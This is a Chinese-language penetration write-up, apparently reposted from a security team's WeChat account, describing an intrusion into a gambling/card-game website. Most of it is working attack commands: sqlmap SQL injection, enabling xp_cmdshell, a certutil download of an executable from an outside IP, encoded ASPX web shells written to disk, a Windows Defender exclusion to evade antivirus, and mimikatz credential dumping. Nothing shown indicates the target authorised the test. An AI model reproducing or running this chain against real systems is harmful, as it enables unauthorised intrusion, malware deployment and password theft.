前段时间看棋牌这套可以说是已经被打烂了,作为刚入门的我,闲着没事准备练练
登录框注入,直接甩sqlmap,也存在弱口令
python .sqlmap.py -r .sql222.txt --dbms=mssql --random-agent --tech B --level 5 --risk 3
得到sqlserver
EXEC sp_configure'show advanced options',1;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
盲开xpshell.
成功接受到,尝试直接powershell CS上线,但是对方有杀软
userName=' WAITFOR DELAY '0:0:1'EXEC master..xp_cmdshell 'whoami'-- wWjW&password=123456&verify=
curl判断出网、站库不分离,准备上马,但是太菜失败嗷
cmd /c certutil.exe -urlcache -split -f http://124.223.118.40/chrome.exe
python sqlmap.py -r sql222.txt --os-shell --proxy="http://127.0.0.1:8080" --dbms="mssql" --os-shell --tech=S
还得用sqlmap来搞,我写weblshell还不行嘛
sqlmap能回显但是太慢
cmd /c "for /f %i in ('dir /s /b c:2c4ef358-b3a3-4d79-8046-64888f56451a.png') do (echo %i> %i.path.txt)" 判断网站路径
http://xxxxxxx/Scripts/jquery-1.10.2.min.js.path.txt
d:网站后台scriptsjquery-1.10.2.min.js
sqlmap写不了嗷 使用burp可,接着写个小马
写进去不大对劲草,写了一个.txt这个错误,难道被解析了?
aspx可以写,然后就没有然后
<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["z"],"unsafe"));%>
^<%@ Page Language="C#" %^>^<%@Import Namespace="System.Reflection"%^>^<%Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%^>
%27%3BDECLARE%20%40nsqt%20VARCHAR%288000%29%3BSET%20%40nsqt%3D0x6563686f205e3c25402050616765204c616e67756167653d2243232220255e3e5e3c2540496d706f7274204e616d6573706163653d2253797374656d2e5265666c656374696f6e22255e3e5e3c2553657373696f6e2e41646428226b222c226534356533323966656235643932356222293b20627974655b5d206b203d20456e636f64696e672e44656661756c742e47657442797465732853657373696f6e5b305d202b202222292c63203d20526571756573742e42696e6172795265616428526571756573742e436f6e74656e744c656e677468293b417373656d626c792e4c6f6164286e65772053797374656d2e53656375726974792e43727970746f6772617068792e52696a6e6461656c4d616e6167656428292e437265617465446563727970746f72286b2c206b292e5472616e73666f726d46696e616c426c6f636b28632c20302c20632e4c656e67746829292e437265617465496e7374616e636528225522292e457175616c732874686973293b255e3e203e643a5ccdf8d5be5cbaf3cca85c3131312e61737078%3BEXEC%20master..xp_cmdshell%20%40nsqt--
这里编码要注意
echo ^<%@ Page Language="C#" %^>^<% Namespace="System.Reflection"%^>^<%Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%^> >d:网站后台111.aspx
最后换成冰蝎的马过了
权限超级小需要提权,md
真牛逼啊
先换一个目录写马 才看一波杀软
这就不好办了呀,能关吗?当然得试试是把,先登录上数据库看看
powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "D:etc-0701GameServer1"
没过一会就被杀了 草 落地没被杀 在通信过程中无了,说明免杀这条路还是不错,不过我选择上哥斯拉看看
bypassAV
我搞免杀还不行嘛淦
次上线很OK,ok个der没执行几个命令就掉
免杀powershell上线
cmd /c powershell -executionpolicy bypass -File
再N次上线,想抓密码的真难抓啊
提权、哟!直接添加用户连接上去
关掉嗷 明明白白
privilege::debug
sekurlsa::logonpasswords
参考原因:https://blog.csdn.net/m0_46622606/article/details/105350970
隔了这么久,今天突然看到一个公众号,想起来是不是因为文章中写的补丁原因,准备尝试一下,现在mimikatz已经更新到了2.2.0版本,还没卸载补丁试了下,直接就可以读到HASH了,原因并不清楚,但是现在算是解决了
成功连接进去,当时我就知道是这个密码猜测和数据库一致但是我硬是连接不进去
结束、整个过程也是搞着玩的,思路很乱,看看就行
Fate师傅TQL!!!
原文始发于微信公众号(HashRun安全团队):某棋牌渗透记录